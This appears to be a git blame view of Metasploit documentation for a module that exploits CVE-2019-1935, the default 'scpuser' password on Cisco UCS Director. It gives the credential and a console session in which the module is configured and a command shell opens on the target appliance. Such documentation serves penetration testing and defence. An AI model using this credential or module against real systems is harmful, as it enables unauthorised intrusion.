Files
metasploit-gs/documentation/modules/exploit/linux/ssh/cisco_ucs_scpuser.md
T

Ignoring revisions in .git-blame-ignore-revs. Click here to bypass and see the normal blame view.

38 lines
1.2 KiB
Markdown
Raw Normal View History

2020-01-20 21:26:59 -05:00
## Vulnerable Application
2019-08-29 22:58:24 +07:00
This module abuses a known default password on Cisco UCS Director. The 'scpuser'
has the password of 'scpuser', and allows an attacker to login to the virtual appliance
via SSH (aka CVE-2019-1935).
This module has been tested with Cisco UCS Director virtual machines 6.6.0 and 6.7.0.
Note that Cisco also mentions in their advisory that their IMC Supervisor and
UCS Director Express are also affected by these vulnerabilities, but this module
was not tested with those products.
2020-01-20 21:26:59 -05:00
## Scenarios
2019-08-29 22:58:24 +07:00
Setup RHOST and run it!
```
2025-07-17 11:51:29 +01:00
msf exploit(linux/http/cisco_ucs_rce) > use exploit/linux/ssh/cisco_ucs_scpuser
msf exploit(linux/ssh/cisco_ucs_scpuser) > set rhost 10.9.8.121
2019-08-29 22:58:24 +07:00
rhost => 10.9.8.121
2025-07-17 11:51:29 +01:00
msf exploit(linux/ssh/cisco_ucs_scpuser) > set lhost 10.9.8.1
2019-08-29 22:58:24 +07:00
lhost => 10.9.8.1
2025-07-17 11:51:29 +01:00
msf exploit(linux/ssh/cisco_ucs_scpuser) > run
2019-08-29 22:58:24 +07:00
[*] 10.9.8.121:22 - Attempt to login to the Cisco appliance...
[+] 10.9.8.121:22 - Login Successful (scpuser:scpuser)
[*] Found shell.
[*] Command shell session 1 opened (10.9.8.1:38113 -> 10.9.8.121:22) at 2019-08-29 22:27:42 +0700
whoami
scpuser
^C
Abort session 1? [y/N] y
""
[*] 10.9.8.121 - Command shell session 1 closed. Reason: User exit
```